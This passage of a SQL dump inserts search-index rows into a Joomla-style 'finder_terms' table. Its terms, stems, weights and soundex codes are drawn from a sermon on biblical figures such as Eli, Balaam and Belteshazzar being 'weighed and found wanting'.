(287790, 'we have looked', 'we have looked', 0, 1, 1.4667, 'W1423', 1, '*'),
(287791, 'weighing', 'weigh', 0, 0, 0.5333, 'W252', 1, '*'),
(287792, 'weighing themselves', 'weigh themselves', 0, 1, 1.6333, 'W252352412', 1, '*'),
(287793, 'weighing themselves already', 'weigh themselves already', 0, 1, 1.9, 'W252352412463', 1, '*'),
(287794, 'weighs a', 'weigh a', 0, 1, 1.2667, 'W200', 1, '*'),
(287795, 'weighs a man', 'weigh a man', 0, 1, 1.4, 'W250', 1, '*'),
(287796, 'weighs less', 'weigh less', 0, 1, 1.3667, 'W242', 1, '*'),
(287797, 'weighs less than', 'weigh less than', 0, 1, 1.5333, 'W24235', 1, '*'),
(287798, 'weight scales', 'weight scales', 0, 1, 1.4333, 'W23242', 1, '*'),
(287799, 'weight scales and', 'weight scales and', 0, 1, 1.5667, 'W2324253', 1, '*'),
(287800, 'weights and', 'weight and', 0, 1, 1.3667, 'W23253', 1, '*'),
(287801, 'weights and balances', 'weight and balances', 0, 1, 1.6667, 'W232531452', 1, '*'),
(287802, 'what they saw', 'what they saw', 0, 1, 1.4333, 'W320', 1, '*'),
(287803, 'whatsoever rechabites', 'whatsoev rechabites', 0, 1, 1.7, 'W32162132', 1, '*'),
(287804, 'whatsoever rechabites jer.35', 'whatsoev rechabites jer.35', 0, 1, 1.9333, 'W321621326', 1, '*'),
(287805, 'when god weighs', 'when god weighs', 0, 1, 1.5, 'W5232', 1, '*'),
(287806, 'which are satanically', 'which are satanically', 0, 1, 1.7, 'W2623524', 1, '*'),
(287807, 'which you measure', 'which you measure', 0, 1, 1.5667, 'W2526', 1, '*'),
(287808, 'will be obedient', 'will be obedient', 0, 1, 1.5333, 'W41353', 1, '*'),
(287809, 'with no compromise', 'with no compromise', 0, 1, 1.6, 'W35251652', 1, '*'),
(287810, 'with which', 'with which', 0, 1, 1.3333, 'W320', 2, '*'),
(287811, 'with which you', 'with which you', 0, 1, 1.4667, 'W320', 1, '*'),
(287812, 'with worldly', 'with worldly', 0, 1, 1.4, 'W36434', 1, '*'),
(287813, 'with worldly fashion', 'with worldly fashion', 0, 1, 1.6667, 'W36434125', 1, '*'),
(287814, 'word and the', 'word and the', 0, 1, 1.4, 'W6353', 1, '*'),
(287815, 'word your', 'word your', 0, 1, 1.3, 'W636', 1, '*'),
(287816, 'word your scale', 'word your scale', 0, 1, 1.5, 'W63624', 1, '*'),
(287817, 'world above', 'world above', 0, 1, 1.3667, 'W6431', 1, '*'),
(287818, 'world above the', 'world above the', 0, 1, 1.5, 'W64313', 1, '*'),
(287819, 'worldly fashion', 'worldli fashion', 0, 1, 1.5, 'W6434125', 1, '*'),
(287820, 'worldly fashion and', 'worldli fashion and', 0, 1, 1.6333, 'W64341253', 1, '*'),
(287821, 'you bring', 'you bring', 0, 1, 1.3, 'Y1652', 1, '*'),
(287822, 'you bring god\'s', 'you bring god', 0, 1, 1.5, 'Y165232', 1, '*'),
(287823, 'you measure', 'you measure', 0, 1, 1.3667, 'Y526', 1, '*'),
(287824, 'you measure your', 'you measure your', 0, 1, 1.5333, 'Y526', 1, '*'),
(287825, 'you\'ll be found', 'you be found', 0, 1, 1.5, 'Y4153', 1, '*'),
(287826, 'you\'ll never be', 'you never be', 0, 1, 1.5, 'Y45161', 1, '*'),
(287827, 'you\'ll not', 'you not', 0, 1, 1.3333, 'Y453', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(287828, 'you\'ll not be', 'you not be', 0, 1, 1.4333, 'Y4531', 1, '*'),
(287829, 'your life you\'ll', 'your life you', 0, 1, 1.5333, 'Y6414', 1, '*'),
(287830, 'your rule', 'your rule', 0, 1, 1.3, 'Y640', 1, '*'),
(287831, 'your rule and', 'your rule and', 0, 1, 1.4333, 'Y6453', 1, '*'),
(287832, 'your scale', 'your scale', 0, 1, 1.3333, 'Y624', 1, '*'),
(287833, 'your scale your', 'your scale your', 0, 1, 1.5, 'Y6246', 1, '*'),
(287834, 'your standard', 'your standard', 0, 1, 1.4333, 'Y6235363', 1, '*'),
(287835, 'your standard and', 'your standard and', 0, 1, 1.5667, 'Y623536353', 1, '*'),
(287836, 'yourself if', 'yourself if', 0, 1, 1.3667, 'Y6241', 1, '*'),
(287837, 'yourself if you', 'yourself if you', 0, 1, 1.5, 'Y6241', 1, '*'),
(287838, 'yourself you\'ll', 'yourself you', 0, 1, 1.5, 'Y62414', 1, '*'),
(287839, 'yourself you\'ll not', 'yourself you not', 0, 1, 1.6333, 'Y6241453', 1, '*'),
(288316, '1 2-4 13-15', '1 2-4 13-15', 0, 1, 1.3667, '', 1, '*'),
(288317, '1 belteshazzar', '1 belteshazzar', 0, 1, 1.4667, 'B4326', 1, '*'),
(288318, '1 belteshazzar dan', '1 belteshazzar dan', 0, 1, 1.6, 'B432635', 1, '*'),
(288319, '1-22 james', '1-22 james', 0, 1, 1.3333, 'J520', 1, '*'),
(288320, '1-22 james 1', '1-22 james 1', 0, 1, 1.4, 'J520', 1, '*'),
(288321, '1-29', '1-29', 0, 0, 0.4, '', 1, '*'),
(288322, '1-29 3', '1-29 3', 0, 1, 1.2, '', 1, '*'),
(288323, '1-29 3 1-22', '1-29 3 1-22', 0, 1, 1.3667, '', 1, '*'),
(288324, '1-9', '1-9', 0, 0, 0.3, '', 1, '*'),
(288325, '1-9 you\'ll', '1-9 you', 0, 1, 1.3333, 'Y400', 1, '*'),
(288326, '1-9 you\'ll see', '1-9 you see', 0, 1, 1.4667, 'Y420', 1, '*'),
(288327, '13-15', '13-15', 0, 0, 0.5, '', 1, '*'),
(288328, '13-15 rom.5', '13-15 rom.5', 0, 1, 1.3667, 'R500', 1, '*'),
(288329, '13-15 rom.5 3-5', '13-15 rom.5 3-5', 0, 1, 1.5, 'R500', 1, '*'),
(288330, '15-20', '15-20', 0, 0, 0.5, '', 1, '*'),
(288331, '15-20 he', '15-20 he', 0, 1, 1.2667, 'H000', 1, '*'),
(288332, '15-20 he wanted', '15-20 he wanted', 0, 1, 1.5, 'H530', 1, '*'),
(288333, '19 7-18', '19 7-18', 0, 1, 1.2333, '', 1, '*'),
(288334, '19 7-18 this', '19 7-18 this', 0, 1, 1.4, 'T200', 1, '*'),
(288335, '1king 19', '1king 19', 0, 1, 1.2667, 'K520', 1, '*'),
(288336, '1king 19 7-18', '1king 19 7-18', 0, 1, 1.4333, 'K520', 1, '*'),
(288337, '1samuel', '1samuel', 0, 0, 0.4667, 'S540', 1, '*'),
(288338, '1samuel 2', '1samuel 2', 0, 1, 1.3, 'S540', 1, '*'),
(288339, '1samuel 2 27-36', '1samuel 2 27-36', 0, 1, 1.5, 'S540', 1, '*'),
(288340, '2 27-36', '2 27-36', 0, 1, 1.2333, '', 1, '*'),
(288341, '2 27-36 god', '2 27-36 god', 0, 1, 1.3667, 'G300', 1, '*'),
(288342, '2 balaam', '2 balaam', 0, 1, 1.2667, 'B450', 1, '*'),
(288343, '2 balaam num', '2 balaam num', 0, 1, 1.4, 'B450', 1, '*'),
(288344, '2-4 13-15', '2-4 13-15', 0, 1, 1.3, '', 1, '*'),
(288345, '2-4 13-15 rom.5', '2-4 13-15 rom.5', 0, 1, 1.5, 'R500', 1, '*'),
(288346, '22 5-12', '22 5-12', 0, 1, 1.2333, '', 1, '*'),
(288347, '22 5-12 15-20', '22 5-12 15-20', 0, 1, 1.4333, '', 1, '*'),
(288348, '25-27', '25-27', 0, 0, 0.5, '', 1, '*'),
(288349, '27-36', '27-36', 0, 0, 0.5, '', 1, '*'),
(288350, '27-36 god', '27-36 god', 0, 1, 1.3, 'G300', 1, '*'),
(288351, '27-36 god found', '27-36 god found', 0, 1, 1.5, 'G3153', 1, '*'),
(288352, '3 1-22', '3 1-22', 0, 1, 1.2, '', 1, '*'),
(288353, '3 1-22 james', '3 1-22 james', 0, 1, 1.4, 'J520', 1, '*'),
(288354, '3 young', '3 young', 0, 1, 1.2333, 'Y520', 1, '*'),
(288355, '3 young prophet', '3 young prophet', 0, 1, 1.5, 'Y521613', 1, '*'),
(288356, '4 eli', '4 eli', 0, 1, 1.1667, 'E400', 1, '*'),
(288357, '4 eli the', '4 eli the', 0, 1, 1.3, 'E430', 1, '*'),
(288358, '42', '42', 0, 0, 0.2, '', 1, '*'),
(288359, '42 weighed', '42 weighed', 0, 1, 1.3333, 'W230', 1, '*'),
(288360, '5 25-27', '5 25-27', 0, 1, 1.2333, '', 1, '*'),
(288361, '5-12', '5-12', 0, 0, 0.4, '', 1, '*'),
(288362, '5-12 15-20', '5-12 15-20', 0, 1, 1.3333, '', 1, '*'),
(288363, '5-12 15-20 he', '5-12 15-20 he', 0, 1, 1.4333, 'H000', 1, '*'),
(288364, '6 rev.2', '6 rev.2', 0, 1, 1.2333, 'R100', 1, '*'),
(288365, '6 rev.2 1-29', '6 rev.2 1-29', 0, 1, 1.4, 'R100', 1, '*'),
(288366, '7-18', '7-18', 0, 0, 0.4, '', 1, '*'),
(288367, '7-18 this', '7-18 this', 0, 1, 1.3, 'T200', 1, '*'),
(288368, '7-18 this man', '7-18 this man', 0, 1, 1.4333, 'T250', 1, '*'),
(288369, 'a family', 'a family', 0, 1, 1.2667, 'A154', 2, '*'),
(288370, 'a family member', 'a family member', 0, 1, 1.5, 'A154516', 1, '*'),
(288371, 'a fault', 'a fault', 0, 1, 1.2333, 'A143', 1, '*'),
(288372, 'a fault his', 'a fault his', 0, 1, 1.3667, 'A1432', 1, '*'),
(288373, 'a lie', 'a lie', 0, 1, 1.1667, 'A400', 1, '*'),
(288374, 'a lie once', 'a lie once', 0, 1, 1.3333, 'A452', 1, '*'),
(288375, 'a matter it', 'a matter it', 0, 1, 1.3667, 'A5363', 1, '*'),
(288376, 'a sooth', 'a sooth', 0, 1, 1.2333, 'A230', 1, '*'),
(288377, 'a sooth sayer', 'a sooth sayer', 0, 1, 1.4333, 'A2326', 1, '*'),
(288378, 'a worldly', 'a worldly', 0, 1, 1.3, 'A6434', 1, '*'),
(288379, 'a worldly gain', 'a worldly gain', 0, 1, 1.4667, 'A643425', 1, '*'),
(288380, 'a wrong value', 'a wrong value', 0, 1, 1.4333, 'A65214', 1, '*'),
(288381, 'about your prophecy', 'about your prophecy', 0, 1, 1.6333, 'A1361612', 1, '*'),
(288382, 'above god', 'abov god', 0, 1, 1.3, 'A123', 1, '*'),
(288383, 'above god do', 'abov god do', 0, 1, 1.4, 'A123', 1, '*'),
(288384, 'acknowledge', 'acknowledg', 0, 0, 0.7333, 'A25432', 1, '*'),
(288385, 'acknowledge god', 'acknowledg god', 0, 1, 1.5, 'A254323', 1, '*'),
(288386, 'acknowledge god 2', 'acknowledg god 2', 0, 1, 1.5667, 'A254323', 1, '*'),
(288387, 'act that', 'act that', 0, 1, 1.2667, 'A230', 1, '*'),
(288388, 'act that he', 'act that he', 0, 1, 1.3667, 'A230', 1, '*'),
(288389, 'after that', 'after that', 0, 1, 1.3333, 'A1363', 1, '*'),
(288390, 'after that if', 'after that if', 0, 1, 1.4333, 'A13631', 1, '*'),
(288391, 'an opinion', 'an opinion', 0, 1, 1.3333, 'A515', 1, '*'),
(288392, 'an opinion contrary', 'an opinion contrary', 0, 1, 1.6333, 'A5152536', 1, '*'),
(288393, 'an unjust', 'an unjust', 0, 1, 1.3, 'A523', 1, '*'),
(288394, 'an unjust thing', 'an unjust thing', 0, 1, 1.5, 'A52352', 1, '*'),
(288395, 'and disobey', 'and disobey', 0, 1, 1.3667, 'A5321', 1, '*'),
(288396, 'and disobey god', 'and disobey god', 0, 1, 1.5, 'A532123', 1, '*'),
(288397, 'and failed', 'and failed', 0, 1, 1.3333, 'A53143', 1, '*'),
(288398, 'and failed and', 'and failed and', 0, 1, 1.4667, 'A5314353', 1, '*'),
(288399, 'and failed just', 'and failed just', 0, 1, 1.5, 'A5314323', 1, '*'),
(288400, 'and in turn', 'and in turn', 0, 1, 1.3667, 'A535365', 1, '*'),
(288401, 'and was', 'and was', 0, 1, 1.2333, 'A532', 1, '*'),
(288402, 'and was even', 'and was even', 0, 1, 1.4, 'A53215', 1, '*'),
(288403, 'and we proceed', 'and we proceed', 0, 1, 1.4667, 'A531623', 1, '*'),
(288404, 'and went', 'and went', 0, 1, 1.2667, 'A5353', 2, '*'),
(288405, 'and went into', 'and went into', 0, 1, 1.4333, 'A535353', 1, '*'),
(288406, 'another god', 'anoth god', 0, 1, 1.3667, 'A53623', 1, '*'),
(288407, 'another god refused', 'anoth god refused', 0, 1, 1.6333, 'A536236123', 1, '*'),
(288408, 'anything that will', 'anyth that will', 0, 1, 1.6, 'A535234', 1, '*'),
(288409, 'applies to people', 'appli to people', 0, 1, 1.5667, 'A142314', 1, '*'),
(288410, 'are you doing', 'ar you doing', 0, 1, 1.4333, 'A6352', 2, '*'),
(288411, 'as a sooth', 'as a sooth', 0, 1, 1.3333, 'A230', 1, '*'),
(288412, 'at various', 'at various', 0, 1, 1.3333, 'A3162', 1, '*'),
(288413, 'at various things', 'at various things', 0, 1, 1.5667, 'A3162352', 1, '*'),
(288414, 'attachments', 'attach', 0, 0, 0.7333, 'A32532', 1, '*'),
(288415, 'attachments at', 'attach at', 0, 1, 1.4667, 'A325323', 1, '*'),
(288416, 'attachments at the', 'attach at the', 0, 1, 1.6, 'A325323', 1, '*'),
(288417, 'attempt', 'attempt', 0, 0, 0.4667, 'A3513', 1, '*'),
(288418, 'attempt to', 'attempt to', 0, 1, 1.3333, 'A3513', 1, '*'),
(288419, 'attempt to commercialize', 'attempt to commercialize', 0, 1, 1.8, 'A3513256242', 1, '*'),
(288420, 'balaam num', 'balaam num', 0, 1, 1.3333, 'B450', 1, '*'),
(288421, 'balaam num 22', 'balaam num 22', 0, 1, 1.4333, 'B450', 1, '*'),
(288422, 'be judgment', 'be judgment', 0, 1, 1.3667, 'B23253', 1, '*'),
(288423, 'be judgment 4', 'be judgment 4', 0, 1, 1.4333, 'B23253', 1, '*'),
(288424, 'be used', 'be used', 0, 1, 1.2333, 'B230', 1, '*'),
(288425, 'be used to', 'be used to', 0, 1, 1.3333, 'B230', 1, '*'),
(288426, 'because of emotional', 'becaus of emotional', 0, 1, 1.6667, 'B215354', 1, '*'),
(288427, 'before divine', 'befor divine', 0, 1, 1.4333, 'B6315', 1, '*'),
(288428, 'before divine judgment', 'befor divine judgment', 0, 1, 1.7333, 'B631523253', 1, '*'),
(288429, 'believed a', 'believ a', 0, 1, 1.3333, 'B413', 1, '*'),
(288430, 'believed a lie', 'believ a lie', 0, 1, 1.4667, 'B4134', 1, '*'),
(288431, 'belteshazzar', 'belteshazzar', 0, 0, 0.8, 'B4326', 1, '*'),
(288432, 'belteshazzar dan', 'belteshazzar dan', 0, 1, 1.5333, 'B432635', 1, '*'),
(288433, 'belteshazzar dan 5', 'belteshazzar dan 5', 0, 1, 1.6, 'B432635', 1, '*'),
(288434, 'but he respected', 'but he respected', 0, 1, 1.5333, 'B362123', 1, '*'),
(288435, 'but respect', 'but respect', 0, 1, 1.3667, 'B362123', 1, '*'),
(288436, 'but respect but', 'but respect but', 0, 1, 1.5, 'B36212313', 1, '*'),
(288437, 'by honouring', 'by honouring', 0, 1, 1.4, 'B5652', 1, '*'),
(288438, 'by honouring his', 'by honouring his', 0, 1, 1.5333, 'B5652', 1, '*'),
(288439, 'collected', 'collect', 0, 0, 0.6, 'C423', 1, '*'),
(288440, 'collected money', 'collect money', 0, 1, 1.5, 'C4235', 1, '*'),
(288441, 'collected money for', 'collect money for', 0, 1, 1.6333, 'C423516', 1, '*'),
(288442, 'comes up with', 'come up with', 0, 1, 1.4333, 'C5213', 1, '*'),
(288443, 'commercialize', 'commerci', 0, 0, 0.8667, 'C56242', 1, '*'),
(288444, 'commercialize your', 'commerci your', 0, 1, 1.6, 'C562426', 1, '*'),
(288445, 'commercialize your gifting', 'commerci your gifting', 0, 1, 1.8667, 'C56242621352', 1, '*'),
(288446, 'considered improper', 'consid improper', 0, 1, 1.6333, 'C5236351616', 1, '*'),
(288447, 'considered improper it', 'consid improper it', 0, 1, 1.7333, 'C52363516163', 1, '*'),
(288448, 'contrary to', 'contrari to', 0, 1, 1.3667, 'C5363', 1, '*'),
(288449, 'contrary to god\'s', 'contrari to god', 0, 1, 1.5667, 'C5363232', 1, '*'),
(288450, 'dan', 'dan', 0, 0, 0.2, 'D500', 1, '*'),
(288451, 'dan 5', 'dan 5', 0, 1, 1.1667, 'D500', 1, '*'),
(288452, 'dan 5 25-27', 'dan 5 25-27', 0, 1, 1.3667, 'D500', 1, '*'),
(288453, 'deceived he', 'deceiv he', 0, 1, 1.3667, 'D213', 1, '*'),
(288454, 'deceived he believed', 'deceiv he believed', 0, 1, 1.6667, 'D2131413', 1, '*'),
(288455, 'depend on you', 'depend on you', 0, 1, 1.4333, 'D1535', 1, '*'),
(288456, 'destruction 1', 'destruct 1', 0, 1, 1.4333, 'D236235', 1, '*'),
(288457, 'destruction 1 belteshazzar', 'destruct 1 belteshazzar', 0, 1, 1.8667, 'D23623514326', 1, '*'),
(288458, 'destruction 3', 'destruct 3', 0, 1, 1.4333, 'D236235', 1, '*'),
(288459, 'destruction 3 young', 'destruct 3 young', 0, 1, 1.6333, 'D2362352', 1, '*'),
(288460, 'died as', 'di as', 0, 1, 1.2333, 'D200', 1, '*'),
(288461, 'died as a', 'di as a', 0, 1, 1.3, 'D200', 1, '*'),
(288462, 'disobey', 'disobei', 0, 0, 0.4667, 'D210', 2, '*'),
(288463, 'disobey god', 'disobei god', 0, 1, 1.3667, 'D2123', 1, '*'),
(288464, 'disobey god secondly', 'disobei god secondly', 0, 1, 1.6667, 'D21232534', 1, '*'),
(288465, 'disobey god the', 'disobei god the', 0, 1, 1.5, 'D2123', 1, '*'),
(288466, 'divine judgment', 'divin judgment', 0, 1, 1.5, 'D1523253', 1, '*'),
(288467, 'divine judgment he', 'divin judgment he', 0, 1, 1.6, 'D1523253', 1, '*'),
(288468, 'divine standards', 'divin standards', 0, 1, 1.5333, 'D152353632', 2, '*'),
(288469, 'divine standards in', 'divin standards in', 0, 1, 1.6333, 'D1523536325', 1, '*'),
(288470, 'do it at', 'do it at', 0, 1, 1.2667, 'D000', 1, '*'),
(288471, 'do you exhibit', 'do you exhibit', 0, 1, 1.4667, 'D213', 1, '*'),
(288472, 'do you respect', 'do you respect', 0, 1, 1.4667, 'D62123', 1, '*'),
(288473, 'doesn\'t matter who', 'doesn matter who', 0, 1, 1.6, 'D253536', 1, '*'),
(288474, 'doing anything that', 'do anything that', 0, 1, 1.6333, 'D5253523', 1, '*'),
(288475, 'eli the', 'eli the', 0, 1, 1.2333, 'E430', 1, '*'),
(288476, 'eli the priest', 'eli the priest', 0, 1, 1.4667, 'E431623', 1, '*'),
(288477, 'eli unworthy', 'eli unworthy', 0, 1, 1.4, 'E4563', 1, '*'),
(288478, 'eli unworthy of', 'eli unworthy of', 0, 1, 1.5, 'E45631', 1, '*'),
(288479, 'eli was', 'eli was', 0, 1, 1.2333, 'E420', 1, '*'),
(288480, 'eli was found', 'eli was found', 0, 1, 1.4333, 'E42153', 1, '*'),
(288481, 'embarked', 'embark', 0, 0, 0.5333, 'E51623', 1, '*'),
(288482, 'embarked upon', 'embark upon', 0, 1, 1.4333, 'E5162315', 1, '*'),
(288483, 'embarked upon that', 'embark upon that', 0, 1, 1.6, 'E51623153', 1, '*'),
(288484, 'emotional attachments', 'emot attachments', 0, 1, 1.7, 'E535432532', 1, '*'),
(288485, 'emotional attachments at', 'emot attachments at', 0, 1, 1.8, 'E5354325323', 1, '*'),
(288486, 'establishing divine', 'establish divine', 0, 1, 1.6333, 'E2314252315', 1, '*'),
(288487, 'establishing divine standards', 'establish divine standards', 0, 1, 1.9667, 'E23142523152353632', 1, '*'),
(288488, 'eternal priesthood', 'etern priesthood', 0, 1, 1.6, 'E36541623', 1, '*'),
(288489, 'eternal priesthood he', 'etern priesthood he', 0, 1, 1.7, 'E36541623', 1, '*'),
(288490, 'even ready', 'even ready', 0, 1, 1.3333, 'E1563', 1, '*'),
(288491, 'even ready to', 'even ready to', 0, 1, 1.4333, 'E1563', 1, '*'),
(288492, 'exhibit', 'exhibit', 0, 0, 0.4667, 'E213', 1, '*'),
(288493, 'exhibit funny', 'exhibit funny', 0, 1, 1.4333, 'E21315', 1, '*'),
(288494, 'exhibit funny weakness', 'exhibit funny weakness', 0, 1, 1.7333, 'E21315252', 1, '*'),
(288495, 'expense of establishing', 'expens of establishing', 0, 1, 1.7667, 'E215212314252', 1, '*'),
(288496, 'expense of god\'s', 'expens of god', 0, 1, 1.5333, 'E21521232', 1, '*'),
(288497, 'expressed will', 'express will', 0, 1, 1.4667, 'E216234', 1, '*'),
(288498, 'expressed will for', 'express will for', 0, 1, 1.6, 'E21623416', 1, '*'),
(288499, 'failed and', 'fail and', 0, 1, 1.3333, 'F4353', 1, '*'),
(288500, 'failed and went', 'fail and went', 0, 1, 1.5, 'F435353', 1, '*'),
(288501, 'failed by', 'fail by', 0, 1, 1.3, 'F431', 1, '*'),
(288502, 'failed by honouring', 'fail by honouring', 0, 1, 1.6333, 'F4315652', 1, '*'),
(288503, 'failed just', 'fail just', 0, 1, 1.3667, 'F4323', 1, '*'),
(288504, 'failed just weight', 'fail just weight', 0, 1, 1.6, 'F432323', 1, '*'),
(288505, 'family member', 'famili member', 0, 1, 1.4333, 'F54516', 1, '*'),
(288506, 'family member because', 'famili member because', 0, 1, 1.7, 'F5451612', 1, '*'),
(288507, 'fault his', 'fault his', 0, 1, 1.3, 'F432', 1, '*'),
(288508, 'fault his problem', 'fault his problem', 0, 1, 1.5667, 'F43216145', 1, '*'),
(288509, 'fear the', 'fear the', 0, 1, 1.2667, 'F630', 2, '*'),
(288510, 'fear the lord', 'fear the lord', 0, 1, 1.4333, 'F63463', 2, '*'),
(288511, 'flesh that when', 'flesh that when', 0, 1, 1.5, 'F4235', 1, '*'),
(288512, 'food but', 'food but', 0, 1, 1.2667, 'F313', 1, '*'),
(288513, 'food but respect', 'food but respect', 0, 1, 1.5333, 'F31362123', 1, '*'),
(288514, 'for future', 'for future', 0, 1, 1.3333, 'F6136', 1, '*'),
(288515, 'for future glory', 'for future glory', 0, 1, 1.5333, 'F6136246', 1, '*'),
(288516, 'for prophecy', 'for prophecy', 0, 1, 1.4, 'F61612', 1, '*'),
(288517, 'for prophecy god', 'for prophecy god', 0, 1, 1.5333, 'F616123', 1, '*'),
(288518, 'for you you\'ll', 'for you you', 0, 1, 1.4667, 'F640', 1, '*'),
(288519, 'found eli', 'found eli', 0, 1, 1.3, 'F534', 1, '*'),
(288520, 'found eli unworthy', 'found eli unworthy', 0, 1, 1.6, 'F534563', 1, '*'),
(288521, 'found wanting and', 'found wanting and', 0, 1, 1.5667, 'F53535253', 1, '*'),
(288522, 'from god it', 'from god it', 0, 1, 1.3667, 'F6523', 1, '*'),
(288523, 'funny weakness', 'funni weakness', 0, 1, 1.4667, 'F5252', 1, '*'),
(288524, 'funny weakness towards', 'funni weakness towards', 0, 1, 1.7333, 'F52523632', 1, '*'),
(288525, 'future glory', 'futur glory', 0, 1, 1.4, 'F36246', 1, '*'),
(288526, 'future glory are', 'futur glory are', 0, 1, 1.5333, 'F36246', 1, '*'),
(288527, 'gain and', 'gain and', 0, 1, 1.2667, 'G530', 1, '*'),
(288528, 'gain and was', 'gain and was', 0, 1, 1.4, 'G532', 1, '*'),
(288529, 'gain he', 'gain he', 0, 1, 1.2333, 'G500', 1, '*'),
(288530, 'gain he collected', 'gain he collected', 0, 1, 1.5667, 'G52423', 1, '*'),
(288531, 'gift of', 'gift of', 0, 1, 1.2333, 'G131', 1, '*'),
(288532, 'gift of god', 'gift of god', 0, 1, 1.3667, 'G13123', 1, '*'),
(288533, 'gifting', 'gift', 0, 0, 0.4667, 'G1352', 1, '*'),
(288534, 'gifting from', 'gift from', 0, 1, 1.4, 'G1352165', 1, '*'),
(288535, 'gifting from god', 'gift from god', 0, 1, 1.5333, 'G135216523', 1, '*'),
(288536, 'gifts', 'gift', 0, 0, 0.3333, 'G132', 4, '*'),
(288537, 'gifts then', 'gift then', 0, 1, 1.3333, 'G13235', 1, '*'),
(288538, 'gifts then destruction', 'gift then destruction', 0, 1, 1.7333, 'G132353236235', 1, '*'),
(288539, 'glory are', 'glori are', 0, 1, 1.3, 'G460', 1, '*'),
(288540, 'glory are you', 'glori are you', 0, 1, 1.4333, 'G460', 1, '*'),
(288541, 'god 2', 'god 2', 0, 1, 1.1667, 'G300', 1, '*'),
(288542, 'god 2 balaam', 'god 2 balaam', 0, 1, 1.4, 'G3145', 1, '*'),
(288543, 'god considered', 'god considered', 0, 1, 1.4667, 'G3252363', 1, '*'),
(288544, 'god considered improper', 'god considered improper', 0, 1, 1.7667, 'G325236351616', 1, '*'),
(288545, 'god do you', 'god do you', 0, 1, 1.3333, 'G300', 1, '*'),
(288546, 'god found', 'god found', 0, 1, 1.3, 'G3153', 1, '*'),
(288547, 'god found eli', 'god found eli', 0, 1, 1.4333, 'G31534', 1, '*'),
(288548, 'god has spoken', 'god has spoken', 0, 1, 1.4667, 'G32125', 1, '*'),
(288549, 'god it leads', 'god it leads', 0, 1, 1.4, 'G3432', 1, '*'),
(288550, 'god judged', 'god judged', 0, 1, 1.3333, 'G32323', 1, '*'),
(288551, 'god judged him', 'god judged him', 0, 1, 1.4667, 'G323235', 1, '*'),
(288552, 'god must', 'god must', 0, 1, 1.2667, 'G3523', 2, '*'),
(288553, 'god must not', 'god must not', 0, 1, 1.4, 'G352353', 1, '*'),
(288554, 'god refused', 'god refused', 0, 1, 1.3667, 'G36123', 1, '*'),
(288555, 'god refused to', 'god refused to', 0, 1, 1.4667, 'G36123', 1, '*'),
(288556, 'god secondly', 'god secondly', 0, 1, 1.4, 'G32534', 1, '*'),
(288557, 'god secondly he', 'god secondly he', 0, 1, 1.5, 'G32534', 1, '*'),
(288558, 'god the next', 'god the next', 0, 1, 1.4, 'G3523', 1, '*'),
(288559, 'god weighed', 'god weighed', 0, 1, 1.3667, 'G323', 1, '*'),
(288560, 'god weighed and', 'god weighed and', 0, 1, 1.5, 'G32353', 1, '*'),
(288561, 'god\'s expressed', 'god expressed', 0, 1, 1.5, 'G321623', 1, '*'),
(288562, 'god\'s expressed will', 'god expressed will', 0, 1, 1.6667, 'G3216234', 1, '*'),
(288563, 'god\'s people', 'god people', 0, 1, 1.4, 'G3214', 2, '*'),
(288564, 'god\'s people he', 'god people he', 0, 1, 1.5, 'G3214', 1, '*'),
(288565, 'has spoken on', 'ha spoken on', 0, 1, 1.4333, 'H2125', 1, '*'),
(288566, 'have an opinion', 'have an opinion', 0, 1, 1.5, 'H1515', 1, '*'),
(288567, 'he believed', 'he believed', 0, 1, 1.3667, 'H1413', 1, '*'),
(288568, 'he believed a', 'he believed a', 0, 1, 1.4333, 'H1413', 1, '*'),
(288569, 'he collected', 'he collected', 0, 1, 1.4, 'H2423', 1, '*'),
(288570, 'he collected money', 'he collected money', 0, 1, 1.6, 'H24235', 1, '*'),
(288571, 'he died', 'he died', 0, 1, 1.2333, 'H300', 1, '*'),
(288572, 'he died as', 'he died as', 0, 1, 1.3333, 'H320', 1, '*'),
(288573, 'he embarked', 'he embarked', 0, 1, 1.3667, 'H51623', 1, '*'),
(288574, 'he embarked upon', 'he embarked upon', 0, 1, 1.5333, 'H5162315', 1, '*'),
(288575, 'he failed by', 'he failed by', 0, 1, 1.4, 'H1431', 1, '*'),
(288576, 'he respected', 'he respected', 0, 1, 1.4, 'H62123', 1, '*'),
(288577, 'he respected a', 'he respected a', 0, 1, 1.4667, 'H62123', 1, '*'),
(288578, 'he wanted', 'he wanted', 0, 1, 1.3, 'H530', 1, '*'),
(288579, 'he wanted a', 'he wanted a', 0, 1, 1.3667, 'H530', 1, '*'),
(288580, 'he was deceived', 'he was deceived', 0, 1, 1.5, 'H23213', 1, '*'),
(288581, 'he worshipped', 'he worshipped', 0, 1, 1.4333, 'H6213', 1, '*'),
(288582, 'he worshipped another', 'he worshipped another', 0, 1, 1.7, 'H6213536', 1, '*'),
(288583, 'him never attempt', 'him never attempt', 0, 1, 1.5667, 'H5163513', 1, '*'),
(288584, 'his mind about', 'hi mind about', 0, 1, 1.4667, 'H25313', 1, '*'),
(288585, 'his problem', 'hi problem', 0, 1, 1.3667, 'H216145', 1, '*'),
(288586, 'his problem wasn\'t', 'hi problem wasn', 0, 1, 1.6, 'H216145253', 1, '*'),
(288587, 'his sons', 'hi sons', 0, 1, 1.2667, 'H252', 1, '*'),
(288588, 'his sons above', 'hi sons above', 0, 1, 1.4667, 'H2521', 1, '*'),
(288589, 'honouring', 'honour', 0, 0, 0.6, 'H5652', 1, '*'),
(288590, 'honouring his', 'honour his', 0, 1, 1.4333, 'H5652', 1, '*'),
(288591, 'honouring his sons', 'honour his sons', 0, 1, 1.6, 'H565252', 1, '*'),
(288592, 'if you disobey', 'if you disobey', 0, 1, 1.4667, 'I1321', 1, '*'),
(288593, 'if you read', 'if you read', 0, 1, 1.3667, 'I163', 1, '*'),
(288594, 'improper', 'improp', 0, 0, 0.5333, 'I51616', 1, '*'),
(288595, 'improper it', 'improp it', 0, 1, 1.3667, 'I516163', 1, '*'),
(288596, 'improper it was', 'improp it was', 0, 1, 1.5, 'I5161632', 1, '*'),
(288597, 'in leadership eli', 'in leadership eli', 0, 1, 1.5667, 'I5436214', 1, '*'),
(288598, 'in the fear', 'in the fear', 0, 1, 1.3667, 'I5316', 1, '*'),
(288599, 'in the flesh', 'in the flesh', 0, 1, 1.4, 'I53142', 1, '*'),
(288600, 'in turn', 'in turn', 0, 1, 1.2333, 'I5365', 1, '*'),
